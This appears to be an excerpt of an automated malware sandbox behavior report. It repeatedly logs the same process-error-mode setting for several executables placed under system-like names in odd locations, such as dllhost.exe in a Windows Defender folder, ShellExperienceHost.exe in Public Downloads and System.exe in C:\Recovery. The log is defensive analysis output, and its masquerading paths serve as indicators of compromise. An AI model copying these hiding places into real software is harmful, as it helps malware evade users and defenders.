Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe	Process information set: NOOPENFILEERRORBOX
